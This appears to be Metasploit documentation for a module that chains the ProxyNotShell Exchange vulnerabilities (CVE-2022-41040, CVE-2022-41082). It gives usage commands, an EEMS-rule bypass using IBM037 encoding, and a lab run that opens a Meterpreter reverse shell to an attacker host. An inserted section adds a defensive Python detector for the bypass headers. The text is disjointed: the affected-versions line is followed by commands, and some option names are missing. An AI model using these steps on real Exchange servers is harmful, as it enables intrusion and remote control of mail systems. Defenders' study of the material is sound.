documentation/modules/exploit/windows/http/exchange_proxynotshell_rce.md
This module chains two vulnerabilities on Microsoft Exchange Server that, when combined, allow an authenticated attacker to interact with the Exchange PowerShell backend (CVE-2022-41040), where a deserialization flaw can be leveraged to obtain code execution (CVE-2022-41082). This exploit only supports Exchange Server 2019.

By taking advantage of this vulnerability, you can execute arbitrary commands on the remote Microsoft Exchange Server.
This vulnerability affects:
```
use exploit/windows/http/exchange_proxynotshell_rce
set RHOSTS [IP]
set USERNAME [USERNAME]
set PASSWORD [PASSWORD]
run
```

Technique to bypass the EEMS rule:

* `none` -- Make no attempt to bypass the EEMS rule. This can be used with the check method to determine if the EEMS M1 rule is applied.
* `IBM037v1` -- Use IBM037 encoding combined with the X-Up-Devcap-Post-Charset header and UP User-Agent prefix. See ProxyNotRelay for more information.
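As an added example (not part of the Metasploit module or its documentation), the following Python flags requests that carry both markers of the IBM037v1 bypass described above, the `X-Up-Devcap-Post-Charset` header naming IBM037 and a User-Agent starting with `UP`. The request records are constructed; the IBM037 spelling variants and the "both markers together" threshold are assumptions, and the check only works where full request headers are visible (a reverse proxy or WAF), since default IIS logs do not record that custom header.

```python
from typing import Dict, List

# Markers of the IBM037v1 bypass as described in the option text above.
CHARSET_HEADER = "x-up-devcap-post-charset"
# Spellings of the IBM037 code page a client might send (assumption: the
# documentation only names "IBM037"; cp037 is Python's alias for it).
IBM037_NAMES = {"ibm037", "cp037", "ibm-037"}
UA_PREFIX = "UP"


def _lower_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """Return a copy with lower-cased names so lookups are case-insensitive."""
    return {name.lower(): value.strip() for name, value in headers.items()}


def eems_bypass_indicators(headers: Dict[str, str]) -> List[str]:
    """Return the bypass markers present in one request's headers."""
    h = _lower_headers(headers)
    found = []
    if h.get("user-agent", "").startswith(UA_PREFIX):
        found.append("user-agent-up-prefix")
    charset = h.get(CHARSET_HEADER, "").lower().replace("_", "-")
    if charset in IBM037_NAMES:
        found.append("post-charset-ibm037")
    return found


def scan_requests(requests: List[Dict]) -> List[Dict]:
    """Flag records showing both markers; either one alone is too noisy.

    Each record is {'id': ..., 'headers': {...}}.
    """
    hits = []
    for req in requests:
        markers = eems_bypass_indicators(req["headers"])
        if len(markers) == 2:
            hits.append({"id": req["id"], "markers": markers})
    return hits


# Constructed sample records for illustration, not captured traffic.
SAMPLE_REQUESTS = [
    {"id": 1, "headers": {"User-Agent": "Mozilla/5.0", "Content-Type": "text/xml"}},
    {"id": 2, "headers": {"User-Agent": "UP.Browser/7.2",
                          "x-up-devcap-post-charset": "IBM037"}},
    {"id": 3, "headers": {"User-Agent": "UP.Browser/7.2"}},
]

if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(f"request {hit['id']}: {', '.join(hit['markers'])}")
```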
The maximum number of times to retry targeting the backend server with the SSRF. This is useful in environments where a Data Availability Group (DAG) is in place and causes requests to be sent to a random backend server.
```
msf exploit(windows/http/exchange_proxynotshell_rce) > set RHOSTS 192.168.159.11
RHOSTS => 192.168.159.11
msf exploit(windows/http/exchange_proxynotshell_rce) > set USERNAME aliddle
USERNAME => aliddle
msf exploit(windows/http/exchange_proxynotshell_rce) > set PASSWORD Password1!
PASSWORD => Password1!
msf exploit(windows/http/exchange_proxynotshell_rce) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending stage (175686 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.11:7290) at 2022-11-18 17:32:18 -0500
meterpreter >
```